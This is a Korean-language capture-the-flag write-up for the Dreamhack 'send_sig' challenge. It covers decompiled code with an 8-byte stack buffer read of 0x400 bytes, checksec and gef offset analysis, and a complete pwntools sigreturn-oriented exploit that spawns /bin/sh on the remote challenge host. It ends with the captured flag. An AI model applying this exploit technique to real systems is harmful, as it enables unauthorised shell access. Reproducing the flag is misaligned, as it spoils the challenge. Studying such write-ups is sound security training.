문제 코드
void FUN_004010b6(void)
{
undefined local_10 [8];
write(1,"Signal:",7);
read(0,local_10,0x400);
return;
}
void entry(void)
{
setvbuf(stdout,(char *)0x0,2,0);
setvbuf(stdin,(char *)0x0,1,0);
write(1,"++++++++++++++++++Welcome to dreamhack++++++++++++++++++\n",0x39);
write(1,"+ You can send a signal to dreamhack server. +\n",0x39);
write(1,"++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n",0x39);
FUN_004010b6();
/* WARNING: Subroutine does not return */
exit(0);
}분석
보호 기법
kali@kali ~/wargame/dreamhack/send_sig checksec send_sig
[*] '/home/kali/wargame/dreamhack/send_sig/send_sig'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)코드 분석
8 바이트 버퍼에 0x400 바이트 크기의 입력을 받아서 버퍼 오버플로우가 발생합니다.
pattern
gef➤ pattern create 50
[+] Generating a pattern of 50 bytes (n=8)
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga
[+] Saved as '$_gef0'
gef➤ r
Starting program: /home/kali/wargame/dreamhack/send_sig/send_sig
[*] Failed to find objfile or not a valid file format: [Errno 2] No such file or directory: 'system-supplied DSO at 0x7ffff7fca000'
++++++++++++++++++Welcome to dreamhack++++++++++++++++++
+ You can send a signal to dreamhack server. +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Signal:aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga
Program received signal SIGSEGV, Segmentation fault.
gef➤ x/gx $rsp
0x7fffffffdfa0: 0x6161616161616163
gef➤ pattern search 0x6161616161616163
[+] Searching for '6361616161616161'/'6161616161616163' with period=8
[+] Found at offset 16 (little-endian search) likely"/bin/sh"
gef➤ grep /bin/sh
[+] Searching '/bin/sh' in memory
[+] In '/home/kali/wargame/dreamhack/send_sig/send_sig'(0x402000-0x403000), permission=r--
0x402000 - 0x402007 → "/bin/sh"
[+] In '/home/kali/wargame/dreamhack/send_sig/send_sig'(0x403000-0x404000), permission=r--
0x403000 - 0x403007 → "/bin/sh"
[+] In '/usr/lib/x86_64-linux-gnu/libc-2.33.so'(0x7ffff7f52000-0x7ffff7f9e000), permission=r--
0x7ffff7f6c882 - 0x7ffff7f6c889 → "/bin/sh" 바이너리에 "/bin/sh" 문자열이 존재합니다.
PIE가 걸려있지 않아서 "/bin/sh" 문자열을 사용할 수 있을거 같습니다.
익스플로잇 코드
from pwn import *
context.arch = "x86_64"
#context.log_level = 'debug'
p = remote("host3.dreamhack.games", 17151)
e = ELF("./send_sig")
r = ROP(e)
pop_rax = r.find_gadget(['pop rax', 'ret'])[0]
syscall = r.find_gadget(['syscall'])[0]
binsh = 0x402000
frame = SigreturnFrame()
# execve("/bin/sh", 0, 0)
frame.rax = 0x3b
frame.rdi = binsh
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall
payload = b"A" * 16
payload += p64(pop_rax)
payload += p64(15)
payload += p64(syscall)
payload += bytes(frame)
p.sendlineafter("Signal:", payload)
p.interactive()익스플로잇 코드를 실행시켜보면
kali@kali ~/wargame/dreamhack/send_sig python3 remote.py
[+] Opening connection to host3.dreamhack.games on port 17151: Done
[*] '/home/kali/wargame/dreamhack/send_sig/send_sig'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] Loaded 5 cached gadgets for './send_sig'
/home/kali/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
res = self.recvuntil(delim, timeout=timeout)
[*] Switching to interactive mode
$ ls
flag.txt
send_sig
$쉘이 뜹니다.
flag 파일을 출력해보면
$ ls
flag.txt
send_sig
$ cat flag.txt
DH{2F84BD30D87330534AC417647DA4EEDC}